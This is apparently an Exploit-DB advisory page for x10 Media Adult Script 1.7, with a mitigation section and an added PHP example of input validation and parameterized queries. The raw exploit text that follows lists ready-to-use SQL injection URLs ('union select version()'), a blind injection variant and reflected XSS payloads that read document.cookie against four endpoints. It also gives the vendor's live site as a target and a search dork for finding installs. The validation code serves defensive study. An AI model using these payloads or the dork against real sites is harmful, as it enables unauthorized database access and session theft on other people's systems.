Vendor: x10 Media Adult Script
By: Moudi
CVSS: 8.8 (HIGH)
Vulnerability types: SQL Injection, Blind SQL Injection, XSS
CWE: 89, 89, 79
Product Name: x10 Media Adult Script
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: YES
Related CWE: N/A
CPE: a:x10media:x10_media_adult_script
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

x10 Media Adult Script 1.7 Multiple Remote Vulnerabilities

x10 Media Adult Script 1.7 is vulnerable to multiple remote vulnerabilities such as SQL Injection, Blind SQL Injection and XSS. An attacker can exploit these vulnerabilities to gain access to sensitive information stored in the database, execute arbitrary SQL commands, and inject malicious scripts into the web page.

Mitigation:

Input validation should be used to prevent SQL Injection, Blind SQL Injection and XSS attacks. The application should also be tested for these vulnerabilities.
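
The validation described above, applied to the parameters the advisory names (`id` on report.php, `key` on video_listing.php), as an added example that is not the x10 Media script's code or the advisory author's. The helper names, the `videos` table and the in-memory SQLite database are assumptions made so the example runs on its own.

```php
<?php
// Added example: hypothetical handlers, not the x10 Media script's code.

// Allow-list check for numeric parameters (report.php?id, category, sort).
// Anything other than a plain positive integer is rejected before SQL runs.
function positive_int($raw): ?int
{
    if (!is_string($raw) || !preg_match('/\A[1-9][0-9]{0,8}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Output encoding for free-text parameters (video_listing.php?key).
// ENT_QUOTES encodes both quote styles, so a value cannot close an attribute.
function html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Parameterized lookup: the id is bound, never concatenated into the SQL text.
function find_report(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, title FROM videos WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data: in-memory SQLite stands in for the real database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE videos (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO videos VALUES (77917, 'sample <b>title</b>')");

// One valid id and the two id values shown in the advisory.
foreach (['77917', 'null union select version()', '77917 and 1=null'] as $raw) {
    $id = positive_int($raw);
    if ($id === null) {
        echo 'rejected (400): ', html($raw), "\n";
        continue;
    }
    $row = find_report($db, $id);
    echo $row ? 'found: ' . html($row['title']) . "\n" : "not found (404)\n";
}

// The search key is reflected only after encoding.
$key = '"><script>alert(document.cookie);</script>';
echo '<input name="key" value="', html($key), '">', "\n";
```

The integer check alone stops both `id` requests from the advisory; the bound parameter and the output encoding remain necessary for fields that legitimately carry free text.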

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] x10 Media Adult Script 1.7 Multiple Remote Vulnerabilities
==============================================================================

	[»] Script:             [ x10 Media Adult Script 1.7 ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.x10media.com/media-script  ]
	[»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ Powered By x10media.com ]
        [»] Price:              [ $45.99 USD ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit + LIVE : SQL INJECTION vulnerability ]===

[»] http://www.site.com/patch/report.php?id=[SQL]

[»] http://www.x10media.com/adult/report.php?id=null+union+select+version()

===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===	
	
[»] http://www.site.com/patch/report.php?id=[BLIND]

[»] http://www.x10media.com/adult/report.php?id=77917 and 1=null+union+select+version()

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/includes/video_ad.php?pic_id=[XSS]
[»] http://www.site.com/patch/linkvideos_listing.php?category=[XSS]
[»] http://www.site.com/patch/templates/header1.php?id=[XSS]
[»] http://www.site.com/patch/video_listing.php?category=[NB]&sort=[NB]&key=[XSS]

[»] http://www.x10media.com/adult/includes/video_ad.php?pic_id="><script>alert(document.cookie);</script>
[»] http://www.x10media.com/adult/linkvideos_listing.php?category="><script>alert(document.cookie);</script>
[»] http://www.x10media.com/adult/templates/header1.php?id="><script>alert(document.cookie);</script>
[»] http://www.x10media.com/adult/video_listing.php?category=42&sort=2&key="><script>alert(document.cookie);</script>

Author: Moudi

###########################################################################

# milw0rm.com [2009-08-03]